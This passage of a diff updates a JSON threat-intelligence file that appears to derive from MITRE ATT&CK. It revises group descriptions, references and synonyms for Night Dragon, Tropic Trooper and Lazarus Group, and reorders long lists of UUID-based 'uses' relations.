"dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fbb470da-1d44-4f29-bbb3-9efbe20f94a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a653431d-6a5e-4600-8ad3-609b5af57064", @@ -1689,6 +1727,13 @@ ], "type": "uses" }, + { + "dest-uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -1697,7 +1742,7 @@ "type": "uses" }, { - "dest-uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", + "dest-uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1717,13 +1762,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e1161124-f22e-487f-9d5f-ed8efc8dcd61", "tags": [ @@ -1736,17 +1774,15 @@ "value": "Dust Storm - G0031" }, { - "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon) The activity from this group is also known as Musical Chairs. (Citation: Arbor Musical Chairs Feb 2018)", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) is a campaign name for activity involving a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)", "meta": { "external_id": "G0014", "refs": [ "https://attack.mitre.org/groups/G0014", - "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", - "https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/" + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" ], "synonyms": [ - "Night Dragon", - "Musical Chairs" + "Night Dragon" ] }, "related": [ @@ -1764,6 +1800,125 @@ ], "type": "uses" }, + { + "dest-uuid": "b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54e8672d-5338-4ad1-954a-a7c986bee530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ @@ -1772,7 +1927,7 @@ "type": "uses" }, { - "dest-uuid": "1a295f87-af63-4d94-b130-039d6221fb11", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1785,6 +1940,13 @@ ], "type": "uses" }, + { + "dest-uuid": "488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9755ecdc-deb0-40e6-af49-713cb0f8ed92", "tags": [ @@ -1797,16 +1959,135 @@ "value": "Night Dragon - G0014" }, { - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government. (Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk)", + "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)", + "meta": { + "external_id": "G0081", + "refs": [ + "https://attack.mitre.org/groups/G0081", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ], + "synonyms": [ + "Tropic Trooper", + "KeyBoy" + ] + }, + "related": [ + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b42378e0-f147-496f-992a-26a49705395b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "56319646-eb6e-41fc-ae53-aadfa7adb924", + "value": "Tropic Trooper - G0081" + }, + { + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government.(Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk)\n\nNorth Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.", "meta": { "external_id": "G0032", "refs": [ "https://attack.mitre.org/groups/G0032", - "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", + "https://securelist.com/lazarus-under-the-hood/77908/", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/", - "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing", - "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" ], "synonyms": [ "Lazarus Group", @@ -1839,70 +2120,7 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1915,20 +2133,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ @@ -1936,139 +2140,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1f6e3702-7ca1-4582-b2e7-4591297d05a8", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ @@ -2077,63 +2148,56 @@ "type": "uses" }, { - "dest-uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08", + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2146,6 +2210,118 @@ ], "type": "uses" }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "495b6cdb-7b5a-4fbc-8d33-e7ef68806d08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", "tags": [ @@ -2153,6 +2329,48 @@ ], "type": "uses" }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "tags": [ @@ -2161,7 +2379,133 @@ "type": "uses" }, { - "dest-uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "24b4ce59-eaac-4c8b-8634-9b093b7ccd92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fece06b7-d4b1-42cf-b81a-5323c917546e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2182,70 +2526,70 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fece06b7-d4b1-42cf-b81a-5323c917546e", + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ 